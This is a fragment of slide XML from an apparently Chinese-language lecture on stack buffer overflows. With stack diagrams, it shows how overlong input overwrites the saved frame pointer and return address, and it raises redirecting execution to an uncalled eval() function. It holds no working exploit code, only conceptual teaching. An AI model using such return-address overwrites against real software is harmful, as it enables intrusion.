            <a:ext cx="4013129" cy="1425117"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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4B583B20-7115-584D-A22F-4418372BC9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780150" y="3573913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Char</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW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tmp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3" name="正方形/長方形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5007A1A0-CAB6-6345-89C1-6A15EDBF92F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780150" y="4050546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Saved BP(Main)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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54304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0D95E-211E-6440-8CF1-603025417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kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>overflow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B6E170-B89F-C94F-BF1C-C22157707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943527"/>
            <a:ext cx="5176944" cy="1522653"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>當使用者輸入 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{703D1263-F0DB-F943-B06A-60E37C3A3D6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694803" y="1998135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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26E92B7D-5701-B847-B1FD-E1F227DA1B3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7906621" y="1936770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" name="正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F64CA201-D4BE-8245-B626-BFBCC17116CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780152" y="5015373"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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8" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4BD28D9-D3A9-EF44-988A-FB8E8E24133B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780151" y="4527179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err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF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aaaaaaaaaaaaa</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF0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0" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FC45EDD-CE0E-4B4E-9D28-65E45935F672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7776844" y="4033882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err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF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aaaaaaaaaaaaa</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF0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05D2C72-4499-1544-B871-EBA2F4BF6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59331"/>
            <a:ext cx="4013129" cy="1425117"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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772928DA-A5F6-3046-B234-D28FE87B76B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7776843" y="3533757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err="1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aaaaaaaaaaaaa</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" dirty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6" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55CCF12E-9174-374A-83C8-9DBA66818241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10102459" y="4570819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Return</a:t>
            </a:r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Address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8643E81-9EB9-CC4B-A3A2-92CCDE3BA4CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10102458" y="3617553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Char</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW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tmp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8" name="正方形/長方形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E65A5BA-615F-4B40-B18D-7793447C3955}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10102458" y="4094186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Saved BP(Main)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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19" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0334A197-EE3D-B245-A858-65CC65383D6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9539762" y="4769599"/>
            <a:ext cx="638710" cy="12838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線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCA178DC-E9CB-9E4F-9B80-2CF251FCD825}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9522765" y="4318074"/>
            <a:ext cx="638710" cy="12838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線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CA4C14A-7541-2E42-982E-B6056EE2B804}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9561951" y="3810751"/>
            <a:ext cx="638710" cy="12838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067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B3C583-45D9-7444-81D2-8E684EB54C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err="1"/>
              <a:t>Objdump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DC4A50-0F11-DF44-AE0C-51A246933E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57682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0D95E-211E-6440-8CF1-603025417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kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>overflow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B6E170-B89F-C94F-BF1C-C22157707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943527"/>
            <a:ext cx="5176944" cy="1522653"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>然後 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>(pop</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>下一個指令位子變成</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>0xaaaaaaaa??</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>核心崩潰</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{703D1263-F0DB-F943-B06A-60E37C3A3D6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694803" y="1998135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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26E92B7D-5701-B847-B1FD-E1F227DA1B3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7906621" y="1936770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" name="正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F64CA201-D4BE-8245-B626-BFBCC17116CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780152" y="5015373"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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8" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4BD28D9-D3A9-EF44-988A-FB8E8E24133B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780151" y="4527179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err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF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aaaaaaaaaaaaa</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF0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0" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FC45EDD-CE0E-4B4E-9D28-65E45935F672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7776844" y="4033882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err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF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aaaaaaaaaaaaa</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF0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05D2C72-4499-1544-B871-EBA2F4BF6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59331"/>
            <a:ext cx="4013129" cy="1425117"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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4E4FC099-A1AF-4A43-A4AF-66F3318E45F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632449" y="4743374"/>
            <a:ext cx="1147702" cy="29759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7984971-A4D4-514D-9E1A-4CDACE868CE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5360114" y="4967745"/>
            <a:ext cx="180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下個指令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN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指向</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>0xaaaa</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US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13723606-95DE-874D-85B6-7DE084C84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02" y="5761972"/>
            <a:ext cx="6147247" cy="335774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545393D2-C604-714C-8B83-FA3E46FF32D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2450829" y="54294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？？？？</a:t>
            </a:r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ECF3A0B1-181E-7541-B9C9-FAA36CB2765C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4054077" y="5312689"/>
            <a:ext cx="1147702" cy="29759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16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6530AD22-6161-6145-9370-F9C2078D873F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7789035" y="3529971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aaaaaaaaaaaaa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0" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B457D973-BC40-FC45-ACA8-68737B61BC80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10178472" y="4566242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Return</a:t>
            </a:r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Address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31" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ADFD8A0-1461-8749-9741-64021E24950B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9539762" y="4769599"/>
            <a:ext cx="638710" cy="12838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37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306A09-4EBF-B449-A81A-6E712B45B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那麼如果我把</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>address</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>蓋成想要的位子呢？</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7224369F-A003-E94A-82A3-AF87319F8028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694803" y="1998135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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85C8A243-E2D6-814A-8A61-112159509B1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7906621" y="1936770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正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B6D56FC-7260-BC44-AAB6-A85E4C3A2080}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780152" y="5015373"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D13132D0-B582-174D-BE54-0083ABFB80D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780151" y="4527179"/>
            <a:ext cx="1908267" cy="4323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solidFill>
                  <a:srgbClr val="FFC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其他程式</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC00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8" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64741E12-AEBA-E74C-B37C-E8A1B205EE81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7776844" y="4033882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aaaaaaaaaaaaa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9" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C7B5501-356A-7D46-9DB4-3018811F1E68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7789035" y="3529971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aaaaaaaaaaaaa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0" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38E7E12B-EA44-0841-BCC8-BDC8F664B56D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10178472" y="4566242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Return</a:t>
            </a:r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Address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11" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B736536-5D5E-5B40-B841-32DEFD586A41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9539762" y="4769599"/>
            <a:ext cx="638710" cy="12838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335F0327-1595-B242-8C6F-04A6B3FA2207}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7206357" y="4429696"/>
            <a:ext cx="573795" cy="3136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90556632-1701-9948-8207-913707EF4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16" y="2214980"/>
            <a:ext cx="65024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019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0049F-6935-B649-87C0-BA415D716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沒人呼叫的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>()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9524C4-2F52-3849-8372-7473C5E38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02" y="1399309"/>
            <a:ext cx="77089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031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956D746-EA77-0348-B9CE-BF91898A7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328" y="1700428"/>
            <a:ext cx="4470400" cy="1587500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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B03E38FA-F6ED-554E-A60E-E22C2317050D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2507672" y="3382513"/>
            <a:ext cx="292939" cy="4639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27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95C63D36-ACA4-FF4B-B744-C59754E37D91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6655712" y="1420832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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B335B3-50E7-9A4D-B5EB-15804EF9AD04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6867530" y="1359467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98E4D1F-ACA1-044D-9CF8-98A3F88BDC6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6741061" y="4438070"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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68C7739-4FD4-1140-90BA-364990ED6AB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6741060" y="3949876"/>
            <a:ext cx="1908267" cy="4323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Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
                <a:ea typeface="Kaiti TC" panose="02010600040101010101" pitchFamily="2" charset="-120"/>
              </a:rPr>
              <a:t>要蓋的地方</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000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18" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{023E0228-B9A7-E141-A97B-5F0F9B43266D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6737753" y="3456579"/>
            <a:ext cx="1908267" cy="4323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err="1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aaaaaaaaaaaaa</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF000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9" name="正方形/長方形 16">
            <a:extLst>
